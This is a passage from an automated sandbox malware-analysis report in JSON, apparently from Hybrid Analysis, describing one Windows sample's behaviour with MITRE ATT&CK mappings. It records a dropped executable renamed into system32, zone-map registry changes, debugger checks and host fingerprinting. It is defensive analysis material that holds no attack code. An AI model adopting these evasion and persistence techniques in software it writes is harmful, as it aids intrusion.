\"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"qhdkbaei.exe.67EE4A76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"qhdkbaei.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qhdkbaei.exe]- [targetUID: 00000000-00005876]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE4FD0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qhdkbaei.exe\" to \"%WINDIR%\\system32\\njrbicei\\qhdkbaei.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-499062 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-819024 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-1659141 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-2427755 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-3252221 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-3481767 [PID: 2232]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002232-00000105-4134064 [PID: 2232]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002564-00000105-753047 [PID: 2564]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E890000\n \"qhdkbaei.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E890000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E890000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002232-00000105-6593674", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" queries volume information of \"C:\\\" at 00000000-00005876-0000010C-1239275\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" queries volume information of \"C:\\\" at 00000000-00005876-0000010C-1240597\n \"qhdkbaei.exe\" queries volume information of \"C:\\\" at 00000000-00003436-0000010C-1575582\n \"qhdkbaei.exe\" queries volume information of \"C:\\\" at 00000000-00003436-0000010C-1577186\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-702195\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1489903\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1939305\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1940808", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c597743794b75ffffffff0c0000004c6259771f794b75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2a0000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006c0600000088eabf75ecf91200b344196c88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40008f2defb0bcf51200616b400088000000f822410081a8bf75ecf9120000009001007ed900000200000800000091325d00 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9375d025200000a0fd7f9a5c5b7700e0fd7fb0c96f0144a0fd7f00000000400000003f0000002500000000a0fd7fa4c96f01c15c5b77608262772500000000a0fd7f9a5c5b7700e0fd7fc8c96f0157895a778083627713174c75d8eb9375 (UID: 00000000-00005876)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100004095100010fb4600145c5a77435c5a77dcfb46000100000094010e000100000090fa4600935c5b7740836277d4a05a770ca82b77dcfb4600010000000100000060e810000000000060fa460090fa4600fcfa460095e1567764563700feffffffd4a05a771bbe4b7500000b7700000000 (UID: 00000000-00004152)\n \"qhdkbaei.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c597743794b75ffffffff0c0000004c6259771f794b75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00003436)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" queries volume information of \"C:\\\" at 00000000-00005876-0000010C-1239275\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" queries volume information of \"C:\\\" at 00000000-00005876-0000010C-1240597\n \"qhdkbaei.exe\" queries volume information of \"C:\\\" at 00000000-00003436-0000010C-1575582\n \"qhdkbaei.exe\" queries volume information of \"C:\\\" at 00000000-00003436-0000010C-1577186\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-702195\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1489903\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1939305\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002564-0000010C-1940808", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002564)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6000fce2120080f47975000060000000000089f47975e05cf1b00200000070e312006ce3120064e2120068e2120018e4120095e1567727383700c0e21200c83a837534e31200d58c7b7570e3120004e3120042a47975a802837544e31200d2f47975080000006ef5797544f57975585df1b00200000070aa896e0000130026bb896e18e31200020000000000130070aa896e48e3120042a47975a80283758ce3120010a9896e08000000e6a8896e24a2bfb00200000070aa896e0000130026bb896eac0e6000780e600058e312008050956e18e41200f9f28d6e40e924de (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000004518c3ab0300000044e56f016f3c92b1c01600008ce56f01c0e46f01590000000300000048e46f0150e46f0118e66f01d0bb1a6c5b48e1dcfeffffff98e56f01bfe5196c4518c3ab98e56f01cce5196c0600000000007d6a01000000dfe5196c3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56f01000000008e00000044e66f01feffffffcce56f01cf005b77d6005b77fbc102768e0000004700000044e66f0100000000a0e56f010000000008e66f01 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600de4f80b144de6f016d826b77942f210004010000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000350036003100650035003300620037003800320063006600650062003000370031003300330036006500390066006600630039006500390039003600360061003900360032006200640039006500660034003900320065003600390065003000330035002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b5a77c7ec0276d8eb9375ac0118000000180000000000000000000400e800c9000000000000000000000000000000000000000500e300c900000000000000000000000870180000000000200000000000000000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000180038a82200000000003e00003e340000c060aa2200d8cd220038121f00f0010000000018000400000038a82200acee6f0104645a7738011800e0635a779bca0276000000000000180040a822006dd1bf75ab1994b16cae40770000000000000000f4010000d8cd2200d82f18000100000000001800500118000c00000040a82200d82f18000200000218000000422c006e820000000000000000000000030000004cee6f01820000007f07000000000000422c006e02000000c075c775d8cd220000000000c075c77568ee6f01e830180000000000d82f1800c0ee6f01ff2b5a77 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000022c514170300000044e56f016f3c92b1381700008ce56f01c0e46f015b0000000300000048e46f0150e46f0118e66f01d0bb1a6c5b48e1dcfeffffff98e56f01bfe5196c22c5141798e56f01cce5196c8205000000007d6a01000000dfe5196c3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001800e8ba1f000000000017000017340000c010bd1f0020092300b8142000b80000000000180000000008e8ba1f00acee6f0104645a7738011800e0635a779bca02760000000000001800f0ba1f006dd1bf75ab1994b16cae40770000000000000000e000000058b51f00500118000100000000001800500118000c000000f0ba1f00500118000200000218000000820000825b0000000000000000000000030000004cee6f01800000000200000000000000b83100895b000000c075c77528b2230000000000c075c77568ee6f01fc2f180000000000d82f1800c0ee6f01ff2b5a77 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000030ee66020300000044e56f016f3c92b1981700008ce56f01c0e46f015b0000000300000048e46f0150e46f0118e66f01d0bb1a6c5b48e1dcfeffffff98e56f01bfe5196c30ee660298e56f01cce5196c8205000000007d6a01000000dfe5196c3333ff048205000006000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"IsWow64Process\" with parameter \"5876\" - (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"qhdkbaei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00005876-20035-267-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005876)\n \"cmd.exe\" called \"FindNextFileW\" with parameter qhdkbaei.exe (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000fefbcb2fc43800000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a800010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003c2eee671834ee670000000000000000\" - (UID: 00000000-00002564)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"qhdkbaei.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"qhdkbaei.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": 